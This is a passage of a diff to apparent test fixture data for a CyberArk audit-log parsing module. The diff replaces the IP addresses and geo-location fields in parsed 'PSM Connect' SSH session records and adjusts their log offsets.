Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:54:56</Timestamp>\n    <IsoTimestamp>2021-03-11T17:54:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:54:56",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm connect",
@@ -363,7 +343,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 10124,
+        "log.offset": 10118,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -374,7 +354,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -411,18 +391,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:56:37Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:37</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:37Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:37</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:37Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:56:37",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm connect",
@@ -443,7 +418,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 12642,
+        "log.offset": 12634,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -454,7 +429,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -491,18 +466,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:23:25Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:25</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:25</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 12:23:25",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm connect",
@@ -523,7 +493,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 15160,
+        "log.offset": 15150,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -534,7 +504,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -572,23 +542,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "d284c268-2ba0-4366-af52-e33459b073a1",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:37Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:37</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:37Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:37</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:37Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 06:49:37",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm connect",
@@ -609,7 +574,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 17678,
+        "log.offset": 17666,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -619,24 +584,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -666,23 +628,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "47747796-03e1-4a11-af39-ab56c00e7732",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:50:43Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:50:43</Timestamp>\n    <IsoTimestamp>2021-03-14T13:50:43Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:50:43</Timestamp>\n    <IsoTimestamp>2021-03-14T13:50:43Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 06:50:43",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm connect",
@@ -703,7 +660,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 21194,
+        "log.offset": 21176,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -713,24 +670,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -758,23 +712,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "29f340df-89e9-405a-beae-0216390cda42",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:31:56Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:31:56</Timestamp>\n    <IsoTimestamp>2021-03-15T10:31:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:31:56</Timestamp>\n    <IsoTimestamp>2021-03-15T10:31:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" 